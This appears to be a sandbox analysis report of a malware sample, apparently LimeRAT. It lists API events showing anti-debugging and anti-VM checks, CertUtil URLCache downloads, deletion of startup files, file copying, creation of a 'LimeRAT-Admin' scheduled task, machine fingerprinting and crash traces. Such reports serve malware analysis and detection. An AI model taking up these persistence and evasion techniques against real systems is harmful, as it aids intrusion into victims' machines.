IsDebuggerPresent May 2, 2022, 8:57 a.m.			0	0
IsDebuggerPresent May 2, 2022, 8:57 a.m.			0	0
IsDebuggerPresent May 2, 2022, 8:57 a.m.			0	0
IsDebuggerPresent May 2, 2022, 8:57 a.m.			0	0
IsDebuggerPresent May 2, 2022, 8:57 a.m.			0	0
IsDebuggerPresent May 2, 2022, 8:57 a.m.			0	0
IsDebuggerPresent May 2, 2022, 8:57 a.m.			0	0
IsDebuggerPresent May 2, 2022, 8:57 a.m.			0	0
IsDebuggerPresent May 2, 2022, 8:57 a.m.			0	0
IsDebuggerPresent May 2, 2022, 8:57 a.m.			0	0
IsDebuggerPresent May 2, 2022, 8:57 a.m.			0	0
IsDebuggerPresent May 2, 2022, 8:57 a.m.			0	0

Command line console output was observed (50 out of 109 events)

Time & API	Arguments	Status	Return
WriteConsoleW May 2, 2022, 8:56 a.m.	buffer: C:\Users\test22\AppData\Local\Temp\updateW> console_handle: 0x0000000000000007	1	1
WriteConsoleW May 2, 2022, 8:56 a.m.	buffer: echo console_handle: 0x0000000000000007	1	1
WriteConsoleW May 2, 2022, 8:56 a.m.	buffer: off console_handle: 0x0000000000000007	1	1
WriteConsoleW May 2, 2022, 8:57 a.m.	buffer: The system cannot find the file specified. console_handle: 0x000000000000000b	1	1
WriteConsoleW May 2, 2022, 8:57 a.m.	buffer: The system cannot find the file specified. console_handle: 0x000000000000000b	1	1
WriteConsoleW May 2, 2022, 8:57 a.m.	buffer: Deleted file - C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\agent.pyw - 바로 가기.lnk console_handle: 0x0000000000000007	1	1
WriteConsoleW May 2, 2022, 8:57 a.m.	buffer: Deleted file - C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini console_handle: 0x0000000000000007	1	1
WriteConsoleW May 2, 2022, 8:57 a.m.	buffer: Deleted file - C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\helps.vbs console_handle: 0x0000000000000007	1	1
WriteConsoleW May 2, 2022, 8:57 a.m.	buffer: Deleted file - C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vm_setting.reg console_handle: 0x0000000000000007	1	1
WriteConsoleW May 2, 2022, 8:57 a.m.	buffer: Deleted file - C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\z.vbs console_handle: 0x0000000000000007	1	1
WriteConsoleW May 2, 2022, 8:57 a.m.	buffer: Deleted file - C:\Users\test22\AppData\Local\Temp\updateW\Microsoft.com console_handle: 0x0000000000000007	1	1
WriteConsoleW May 2, 2022, 8:57 a.m.	buffer: C:\Users\test22\AppData\Local\Temp\updateW\winlogins.exe console_handle: 0x0000000000000007	1	1
WriteConsoleW May 2, 2022, 8:57 a.m.	buffer: Access is denied. console_handle: 0x000000000000000b	1	1
WriteConsoleW May 2, 2022, 8:57 a.m.	buffer: The system cannot find the file specified. console_handle: 0x000000000000000b	1	1
WriteConsoleW May 2, 2022, 8:57 a.m.	buffer: The system cannot find the file specified. console_handle: 0x000000000000000b	1	1
WriteConsoleW May 2, 2022, 8:57 a.m.	buffer: Deleted file - C:\Users\test22\AppData\Local\Temp\updateW\win.com console_handle: 0x0000000000000007	1	1
WriteConsoleW May 2, 2022, 8:57 a.m.	buffer: Deleted file - C:\Users\test22\AppData\Local\Temp\updateW\64a1.com console_handle: 0x0000000000000007	1	1
WriteConsoleW May 2, 2022, 8:57 a.m.	buffer: Deleted file - C:\Users\test22\AppData\Local\Temp\IE.exe console_handle: 0x0000000000000007	1	1
WriteConsoleW May 2, 2022, 8:56 a.m.	buffer: ** Online ** console_handle: 0x0000000000000007	1	1
WriteConsoleW May 2, 2022, 8:56 a.m.	buffer: 003f console_handle: 0x0000000000000007	1	1
WriteConsoleW May 2, 2022, 8:56 a.m.	buffer: CertUtil: -URLCache command completed successfully. console_handle: 0x0000000000000007	1	1
WriteConsoleW May 2, 2022, 8:56 a.m.	buffer: ** Online ** console_handle: 0x0000000000000007	1	1
WriteConsoleW May 2, 2022, 8:56 a.m.	buffer: CertUtil: -URLCache command completed successfully. console_handle: 0x0000000000000007	1	1
WriteConsoleW May 2, 2022, 8:56 a.m.	buffer: ** Online ** console_handle: 0x0000000000000007	1	1
WriteConsoleW May 2, 2022, 8:56 a.m.	buffer: CertUtil: -URLCache command completed successfully. console_handle: 0x0000000000000007	1	1
WriteConsoleW May 2, 2022, 8:57 a.m.	buffer: The operation completed successfully. console_handle: 0x0000000000000007	1	1
WriteConsoleW May 2, 2022, 8:57 a.m.	buffer: The operation completed successfully. console_handle: 0x0000000000000007	1	1
WriteConsoleW May 2, 2022, 8:57 a.m.	buffer: The operation completed successfully. console_handle: 0x0000000000000007	1	1
WriteConsoleW May 2, 2022, 8:57 a.m.	buffer: C:\Users\test22\AppData\Local\Temp\updateW\winupdate.exe console_handle: 0x0000000000000013	1	1
WriteConsoleW May 2, 2022, 8:57 a.m.	buffer: 1 File(s) copied console_handle: 0x0000000000000013	1	1
WriteConsoleW May 2, 2022, 8:57 a.m.	buffer: Path not found - C:\Users\test22\AppData console_handle: 0x0000000000000013	1	1
WriteConsoleW May 2, 2022, 8:57 a.m.	buffer: \Roaming\AppData\Windows Protector console_handle: 0x0000000000000013	1	1
WriteConsoleW May 2, 2022, 8:57 a.m.	buffer: File not found - C:\Users\test22\AppData console_handle: 0x0000000000000013	1	1
WriteConsoleW May 2, 2022, 8:57 a.m.	buffer: \Roaming\AppData\Windows Protector console_handle: 0x0000000000000013	1	1
WriteConsoleW May 2, 2022, 8:57 a.m.	buffer: C:\Users\test22\AppData\Local\Temp\updateW\Microsoft.com console_handle: 0x0000000000000013	1	1
WriteConsoleW May 2, 2022, 8:57 a.m.	buffer: 1 File(s) copied console_handle: 0x0000000000000013	1	1
WriteConsoleW May 2, 2022, 8:57 a.m.	buffer: Path not found - C:\Windows (x86) console_handle: 0x0000000000000013	1	1
WriteConsoleW May 2, 2022, 8:57 a.m.	buffer: ** Online ** console_handle: 0x0000000000000007	1	1
WriteConsoleW May 2, 2022, 8:57 a.m.	buffer: 0faead console_handle: 0x0000000000000007	1	1
WriteConsoleW May 2, 2022, 8:57 a.m.	buffer: CertUtil: -URLCache command completed successfully. console_handle: 0x0000000000000007	1	1
WriteConsoleW May 2, 2022, 8:57 a.m.	buffer: SUCCESS: The scheduled task "LimeRAT-Admin" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW May 2, 2022, 8:57 a.m.	buffer: ** Online ** console_handle: 0x0000000000000007	1	1
WriteConsoleW May 2, 2022, 8:57 a.m.	buffer: 2fe15d console_handle: 0x0000000000000007	1	1
WriteConsoleW May 2, 2022, 8:57 a.m.	buffer: CertUtil: -URLCache command completed successfully. console_handle: 0x0000000000000007	1	1
WriteConsoleW May 2, 2022, 8:57 a.m.	buffer: C:\Windows (x86)> console_handle: 0x0000000000000007	1	1
WriteConsoleW May 2, 2022, 8:57 a.m.	buffer: echo console_handle: 0x0000000000000007	1	1
WriteConsoleW May 2, 2022, 8:57 a.m.	buffer: off console_handle: 0x0000000000000007	1	1
WriteConsoleW May 2, 2022, 8:57 a.m.	buffer: Could Not Find C:\Windows (x86)\config.json console_handle: 0x000000000000000b	1	1
WriteConsoleW May 2, 2022, 8:57 a.m.	buffer: C:\Windows (x86)\1xs.txt console_handle: 0x000000000000000b	1	1
WriteConsoleW May 2, 2022, 8:57 a.m.	buffer: C:\Windows (x86)\2xs.txt console_handle: 0x000000000000000b	1	1

Uses Windows APIs to generate a cryptographic key (6 events)

Time & API	Arguments	Status	Return
CryptExportKey May 2, 2022, 8:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002d2318 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2022, 8:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002d2118 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2022, 8:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002d2118 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2022, 8:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00654c70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2022, 8:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00654770 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 2, 2022, 8:57 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00654770 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

This executable has a PDB path (1 event)

pdb_path

D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx May 2, 2022, 8:57 a.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 event)

section

.gfids

The file contains an unknown PE resource name possibly indicative of a packer (1 event)

resource name

PNG

One or more processes crashed (26 events)

Time & API	Arguments	Status
__exception__ May 2, 2022, 8:56 a.m.	stacktrace: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d @ 0x7fefda7a49d RpcRaiseException+0x53 RpcExceptionFilter-0x2bd rpcrt4+0x173c3 @ 0x7fefde573c3 ObjectStublessClient32+0x8bf CoDisconnectContext-0x107b9 ole32+0x443bf @ 0x7feff1d43bf IUnknown_AddRef_Proxy+0x1f5 NdrFixedArrayBufferSize-0xeb rpcrt4+0x35295 @ 0x7fefde75295 I_RpcFreeBuffer+0x1b9 NdrRangeUnmarshall-0x5a7 rpcrt4+0x32799 @ 0x7fefde72799 Ndr64AsyncServerCallAll+0xa9e Ndr64AsyncClientCall-0xf42 rpcrt4+0xdaf1e @ 0x7fefdf1af1e Ndr64AsyncServerCallAll+0x12ec Ndr64AsyncClientCall-0x6f4 rpcrt4+0xdb76c @ 0x7fefdf1b76c NdrStubCall3+0xc6 NdrOleAllocate-0x3ea rpcrt4+0x348d6 @ 0x7fefde748d6 CoGetInstanceFromFile+0x4cd3 HACCEL_UserFree-0x70fd ole32+0x170883 @ 0x7feff300883 CoGetInstanceFromFile+0x511d HACCEL_UserFree-0x6cb3 ole32+0x170ccd @ 0x7feff300ccd CoGetInstanceFromFile+0x5093 HACCEL_UserFree-0x6d3d ole32+0x170c43 @ 0x7feff300c43 CoSetState+0x1450 DcomChannelSetHResult-0x34c ole32+0x2a4f0 @ 0x7feff1ba4f0 GetErrorInfo+0x599 ObjectStublessClient7-0xb1f ole32+0x3d551 @ 0x7feff1cd551 CoGetInstanceFromFile+0x78ce HACCEL_UserFree-0x4502 ole32+0x17347e @ 0x7feff30347e CoGetInstanceFromFile+0x567b HACCEL_UserFree-0x6755 ole32+0x17122b @ 0x7feff30122b CoGetInstanceFromFile+0x7992 HACCEL_UserFree-0x443e ole32+0x173542 @ 0x7feff303542 GetErrorInfo+0x475 ObjectStublessClient7-0xc43 ole32+0x3d42d @ 0x7feff1cd42d GetErrorInfo+0x21e ObjectStublessClient7-0xe9a ole32+0x3d1d6 @ 0x7feff1cd1d6 TranslateMessageEx+0x2a1 IntersectRect-0x11f user32+0x19bd1 @ 0x77379bd1 TranslateMessage+0x1ea DispatchMessageW-0x42 user32+0x198da @ 0x773798da GetErrorInfo+0xf3 ObjectStublessClient7-0xfc5 ole32+0x3d0ab @ 0x7feff1cd0ab CoUnloadingWOW+0x117 OleCreateFromFileEx-0x1829 ole32+0x163e57 @ 0x7feff2f3e57 ObjectStublessClient24+0x1876 CLSIDFromString-0x57a ole32+0x10106 @ 0x7feff1a0106 ObjectStublessClient24+0x18f2 CLSIDFromString-0x4fe ole32+0x10182 @ 0x7feff1a0182 BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76f9652d RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x7748c521 exception.instruction_r: 48 81 c4 c8 00 00 00 c3 48 85 f6 74 08 83 3b 00 exception.symbol: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d exception.instruction: add rsp, 0xc8 exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 42141 exception.address: 0x7fefda7a49d registers.r14: 0 registers.r15: 0 registers.rcx: 48752240 registers.rsi: 0 registers.r10: 0 registers.rbx: 0 registers.rsp: 48758192 registers.r11: 48754000 registers.r8: 0 registers.r9: 0 registers.rdx: 1 registers.r12: 0 registers.rbp: 0 registers.rdi: 0 registers.rax: 1975475068 registers.r13: 0	1
__exception__ May 2, 2022, 8:57 a.m.	stacktrace: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d @ 0x7fefda7a49d RpcRaiseException+0x53 RpcExceptionFilter-0x2bd rpcrt4+0x173c3 @ 0x7fefde573c3 ObjectStublessClient32+0x8bf CoDisconnectContext-0x107b9 ole32+0x443bf @ 0x7feff1d43bf IUnknown_AddRef_Proxy+0x1f5 NdrFixedArrayBufferSize-0xeb rpcrt4+0x35295 @ 0x7fefde75295 I_RpcFreeBuffer+0x1b9 NdrRangeUnmarshall-0x5a7 rpcrt4+0x32799 @ 0x7fefde72799 Ndr64AsyncServerCallAll+0xa9e Ndr64AsyncClientCall-0xf42 rpcrt4+0xdaf1e @ 0x7fefdf1af1e Ndr64AsyncServerCallAll+0x12ec Ndr64AsyncClientCall-0x6f4 rpcrt4+0xdb76c @ 0x7fefdf1b76c NdrStubCall3+0xc6 NdrOleAllocate-0x3ea rpcrt4+0x348d6 @ 0x7fefde748d6 CoGetInstanceFromFile+0x4cd3 HACCEL_UserFree-0x70fd ole32+0x170883 @ 0x7feff300883 CoGetInstanceFromFile+0x511d HACCEL_UserFree-0x6cb3 ole32+0x170ccd @ 0x7feff300ccd CoGetInstanceFromFile+0x5093 HACCEL_UserFree-0x6d3d ole32+0x170c43 @ 0x7feff300c43 CoSetState+0x1450 DcomChannelSetHResult-0x34c ole32+0x2a4f0 @ 0x7feff1ba4f0 GetErrorInfo+0x599 ObjectStublessClient7-0xb1f ole32+0x3d551 @ 0x7feff1cd551 CoGetInstanceFromFile+0x78ce HACCEL_UserFree-0x4502 ole32+0x17347e @ 0x7feff30347e CoGetInstanceFromFile+0x567b HACCEL_UserFree-0x6755 ole32+0x17122b @ 0x7feff30122b CoGetInstanceFromFile+0x7992 HACCEL_UserFree-0x443e ole32+0x173542 @ 0x7feff303542 GetErrorInfo+0x475 ObjectStublessClient7-0xc43 ole32+0x3d42d @ 0x7feff1cd42d GetErrorInfo+0x21e ObjectStublessClient7-0xe9a ole32+0x3d1d6 @ 0x7feff1cd1d6 TranslateMessageEx+0x2a1 IntersectRect-0x11f user32+0x19bd1 @ 0x77379bd1 TranslateMessage+0x1ea DispatchMessageW-0x42 user32+0x198da @ 0x773798da GetErrorInfo+0xf3 ObjectStublessClient7-0xfc5 ole32+0x3d0ab @ 0x7feff1cd0ab CoUnloadingWOW+0x117 OleCreateFromFileEx-0x1829 ole32+0x163e57 @ 0x7feff2f3e57 ObjectStublessClient24+0x1876 CLSIDFromString-0x57a ole32+0x10106 @ 0x7feff1a0106 ObjectStublessClient24+0x18f2 CLSIDFromString-0x4fe ole32+0x10182 @ 0x7feff1a0182 BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76f9652d RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x7748c521 exception.instruction_r: 48 81 c4 c8 00 00 00 c3 48 85 f6 74 08 83 3b 00 exception.symbol: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d exception.instruction: add rsp, 0xc8 exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 42141 exception.address: 0x7fefda7a49d registers.r14: 0 registers.r15: 0 registers.rcx: 49275088 registers.rsi: 0 registers.r10: 0 registers.rbx: 0 registers.rsp: 49281040 registers.r11: 49276848 registers.r8: 0 registers.r9: 0 registers.rdx: 1 registers.r12: 0 registers.rbp: 0 registers.rdi: 0 registers.rax: 1974949214 registers.r13: 0	1
__exception__ May 2, 2022, 8:57 a.m.	stacktrace: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d @ 0x7fefda7a49d RpcRaiseException+0x53 RpcExceptionFilter-0x2bd rpcrt4+0x173c3 @ 0x7fefde573c3 ObjectStublessClient32+0x8bf CoDisconnectContext-0x107b9 ole32+0x443bf @ 0x7feff1d43bf IUnknown_AddRef_Proxy+0x1f5 NdrFixedArrayBufferSize-0xeb rpcrt4+0x35295 @ 0x7fefde75295 I_RpcFreeBuffer+0x1b9 NdrRangeUnmarshall-0x5a7 rpcrt4+0x32799 @ 0x7fefde72799 Ndr64AsyncServerCallAll+0xa9e Ndr64AsyncClientCall-0xf42 rpcrt4+0xdaf1e @ 0x7fefdf1af1e Ndr64AsyncServerCallAll+0x12ec Ndr64AsyncClientCall-0x6f4 rpcrt4+0xdb76c @ 0x7fefdf1b76c NdrStubCall3+0xc6 NdrOleAllocate-0x3ea rpcrt4+0x348d6 @ 0x7fefde748d6 CoGetInstanceFromFile+0x4cd3 HACCEL_UserFree-0x70fd ole32+0x170883 @ 0x7feff300883 CoGetInstanceFromFile+0x511d HACCEL_UserFree-0x6cb3 ole32+0x170ccd @ 0x7feff300ccd CoGetInstanceFromFile+0x5093 HACCEL_UserFree-0x6d3d ole32+0x170c43 @ 0x7feff300c43 CoSetState+0x1450 DcomChannelSetHResult-0x34c ole32+0x2a4f0 @ 0x7feff1ba4f0 GetErrorInfo+0x599 ObjectStublessClient7-0xb1f ole32+0x3d551 @ 0x7feff1cd551 CoGetInstanceFromFile+0x78ce HACCEL_UserFree-0x4502 ole32+0x17347e @ 0x7feff30347e CoGetInstanceFromFile+0x567b HACCEL_UserFree-0x6755 ole32+0x17122b @ 0x7feff30122b CoGetInstanceFromFile+0x7992 HACCEL_UserFree-0x443e ole32+0x173542 @ 0x7feff303542 GetErrorInfo+0x475 ObjectStublessClient7-0xc43 ole32+0x3d42d @ 0x7feff1cd42d GetErrorInfo+0x21e ObjectStublessClient7-0xe9a ole32+0x3d1d6 @ 0x7feff1cd1d6 TranslateMessageEx+0x2a1 IntersectRect-0x11f user32+0x19bd1 @ 0x77379bd1 TranslateMessage+0x1ea DispatchMessageW-0x42 user32+0x198da @ 0x773798da GetErrorInfo+0xf3 ObjectStublessClient7-0xfc5 ole32+0x3d0ab @ 0x7feff1cd0ab CoUnloadingWOW+0x117 OleCreateFromFileEx-0x1829 ole32+0x163e57 @ 0x7feff2f3e57 ObjectStublessClient24+0x1876 CLSIDFromString-0x57a ole32+0x10106 @ 0x7feff1a0106 ObjectStublessClient24+0x18f2 CLSIDFromString-0x4fe ole32+0x10182 @ 0x7feff1a0182 BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76f9652d RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x7748c521 exception.instruction_r: 48 81 c4 c8 00 00 00 c3 48 85 f6 74 08 83 3b 00 exception.symbol: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d exception.instruction: add rsp, 0xc8 exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 42141 exception.address: 0x7fefda7a49d registers.r14: 0 registers.r15: 0 registers.rcx: 48556128 registers.rsi: 0 registers.r10: 0 registers.rbx: 0 registers.rsp: 48562080 registers.r11: 48557888 registers.r8: 0 registers.r9: 0 registers.rdx: 1 registers.r12: 0 registers.rbp: 0 registers.rdi: 0 registers.rax: 1975280055 registers.r13: 0	1
__exception__ May 2, 2022, 8:57 a.m.	stacktrace: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d @ 0x7fefda7a49d RpcRaiseException+0x53 RpcExceptionFilter-0x2bd rpcrt4+0x173c3 @ 0x7fefde573c3 ObjectStublessClient32+0x8bf CoDisconnectContext-0x107b9 ole32+0x443bf @ 0x7feff1d43bf IUnknown_AddRef_Proxy+0x1f5 NdrFixedArrayBufferSize-0xeb rpcrt4+0x35295 @ 0x7fefde75295 I_RpcFreeBuffer+0x1b9 NdrRangeUnmarshall-0x5a7 rpcrt4+0x32799 @ 0x7fefde72799 Ndr64AsyncServerCallAll+0xa9e Ndr64AsyncClientCall-0xf42 rpcrt4+0xdaf1e @ 0x7fefdf1af1e Ndr64AsyncServerCallAll+0x12ec Ndr64AsyncClientCall-0x6f4 rpcrt4+0xdb76c @ 0x7fefdf1b76c NdrStubCall3+0xc6 NdrOleAllocate-0x3ea rpcrt4+0x348d6 @ 0x7fefde748d6 CoGetInstanceFromFile+0x4cd3 HACCEL_UserFree-0x70fd ole32+0x170883 @ 0x7feff300883 CoGetInstanceFromFile+0x511d HACCEL_UserFree-0x6cb3 ole32+0x170ccd @ 0x7feff300ccd CoGetInstanceFromFile+0x5093 HACCEL_UserFree-0x6d3d ole32+0x170c43 @ 0x7feff300c43 CoSetState+0x1450 DcomChannelSetHResult-0x34c ole32+0x2a4f0 @ 0x7feff1ba4f0 GetErrorInfo+0x599 ObjectStublessClient7-0xb1f ole32+0x3d551 @ 0x7feff1cd551 CoGetInstanceFromFile+0x78ce HACCEL_UserFree-0x4502 ole32+0x17347e @ 0x7feff30347e CoGetInstanceFromFile+0x567b HACCEL_UserFree-0x6755 ole32+0x17122b @ 0x7feff30122b CoGetInstanceFromFile+0x7992 HACCEL_UserFree-0x443e ole32+0x173542 @ 0x7feff303542 GetErrorInfo+0x475 ObjectStublessClient7-0xc43 ole32+0x3d42d @ 0x7feff1cd42d GetErrorInfo+0x21e ObjectStublessClient7-0xe9a ole32+0x3d1d6 @ 0x7feff1cd1d6 TranslateMessageEx+0x2a1 IntersectRect-0x11f user32+0x19bd1 @ 0x77379bd1 TranslateMessage+0x1ea DispatchMessageW-0x42 user32+0x198da @ 0x773798da GetErrorInfo+0xf3 ObjectStublessClient7-0xfc5 ole32+0x3d0ab @ 0x7feff1cd0ab CoUnloadingWOW+0x117 OleCreateFromFileEx-0x1829 ole32+0x163e57 @ 0x7feff2f3e57 ObjectStublessClient24+0x1876 CLSIDFromString-0x57a ole32+0x10106 @ 0x7feff1a0106 ObjectStublessClient24+0x18f2 CLSIDFromString-0x4fe ole32+0x10182 @ 0x7feff1a0182 BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76f9652d RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x7748c521 exception.instruction_r: 48 81 c4 c8 00 00 00 c3 48 85 f6 74 08 83 3b 00 exception.symbol: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d exception.instruction: add rsp, 0xc8 exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 42141 exception.address: 0x7fefda7a49d registers.r14: 0 registers.r15: 0 registers.rcx: 48620928 registers.rsi: 0 registers.r10: 0 registers.rbx: 0 registers.rsp: 48626880 registers.r11: 48622688 registers.r8: 0 registers.r9: 0 registers.rdx: 1 registers.r12: 0 registers.rbp: 0 registers.rdi: 0 registers.rax: 1975347552 registers.r13: 0	1
__exception__ May 2, 2022, 8:57 a.m.	stacktrace: 0xaf0567 0xaf0308 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72a12652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72a2264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72a22e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72ad74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72ad7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72b61dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72b61e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72b61f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x72b6416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f1f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x74317f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x74314de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 dc eb 1f 8b c8 e8 54 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xaf06a9 registers.esp: 1830292 registers.edi: 40848380 registers.eax: 0 registers.ebp: 1830332 registers.edx: 195 registers.ebx: 1830628 registers.esi: 40853068 registers.ecx: 0	1
__exception__ May 2, 2022, 8:57 a.m.	stacktrace: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d @ 0x7fefda7a49d RpcRaiseException+0x53 RpcExceptionFilter-0x2bd rpcrt4+0x173c3 @ 0x7fefde573c3 ObjectStublessClient32+0x8bf CoDisconnectContext-0x107b9 ole32+0x443bf @ 0x7feff1d43bf IUnknown_AddRef_Proxy+0x1f5 NdrFixedArrayBufferSize-0xeb rpcrt4+0x35295 @ 0x7fefde75295 I_RpcFreeBuffer+0x1b9 NdrRangeUnmarshall-0x5a7 rpcrt4+0x32799 @ 0x7fefde72799 Ndr64AsyncServerCallAll+0xa9e Ndr64AsyncClientCall-0xf42 rpcrt4+0xdaf1e @ 0x7fefdf1af1e Ndr64AsyncServerCallAll+0x12ec Ndr64AsyncClientCall-0x6f4 rpcrt4+0xdb76c @ 0x7fefdf1b76c NdrStubCall3+0xc6 NdrOleAllocate-0x3ea rpcrt4+0x348d6 @ 0x7fefde748d6 CoGetInstanceFromFile+0x4cd3 HACCEL_UserFree-0x70fd ole32+0x170883 @ 0x7feff300883 CoGetInstanceFromFile+0x511d HACCEL_UserFree-0x6cb3 ole32+0x170ccd @ 0x7feff300ccd CoGetInstanceFromFile+0x5093 HACCEL_UserFree-0x6d3d ole32+0x170c43 @ 0x7feff300c43 CoSetState+0x1450 DcomChannelSetHResult-0x34c ole32+0x2a4f0 @ 0x7feff1ba4f0 GetErrorInfo+0x599 ObjectStublessClient7-0xb1f ole32+0x3d551 @ 0x7feff1cd551 CoGetInstanceFromFile+0x78ce HACCEL_UserFree-0x4502 ole32+0x17347e @ 0x7feff30347e CoGetInstanceFromFile+0x567b HACCEL_UserFree-0x6755 ole32+0x17122b @ 0x7feff30122b CoGetInstanceFromFile+0x7992 HACCEL_UserFree-0x443e ole32+0x173542 @ 0x7feff303542 GetErrorInfo+0x475 ObjectStublessClient7-0xc43 ole32+0x3d42d @ 0x7feff1cd42d GetErrorInfo+0x21e ObjectStublessClient7-0xe9a ole32+0x3d1d6 @ 0x7feff1cd1d6 TranslateMessageEx+0x2a1 IntersectRect-0x11f user32+0x19bd1 @ 0x77379bd1 TranslateMessage+0x1ea DispatchMessageW-0x42 user32+0x198da @ 0x773798da GetErrorInfo+0xf3 ObjectStublessClient7-0xfc5 ole32+0x3d0ab @ 0x7feff1cd0ab CoUnloadingWOW+0x117 OleCreateFromFileEx-0x1829 ole32+0x163e57 @ 0x7feff2f3e57 ObjectStublessClient24+0x1876 CLSIDFromString-0x57a ole32+0x10106 @ 0x7feff1a0106 ObjectStublessClient24+0x18f2 CLSIDFromString-0x4fe ole32+0x10182 @ 0x7feff1a0182 BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76f9652d RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x7748c521 exception.instruction_r: 48 81 c4 c8 00 00 00 c3 48 85 f6 74 08 83 3b 00 exception.symbol: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d exception.instruction: add rsp, 0xc8 exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 42141 exception.address: 0x7fefda7a49d registers.r14: 0 registers.r15: 0 registers.rcx: 42066608 registers.rsi: 0 registers.r10: 0 registers.rbx: 0 registers.rsp: 42072560 registers.r11: 42068368 registers.r8: 0 registers.r9: 0 registers.rdx: 1 registers.r12: 0 registers.rbp: 0 registers.rdi: 0 registers.rax: 1977166221 registers.r13: 0	1
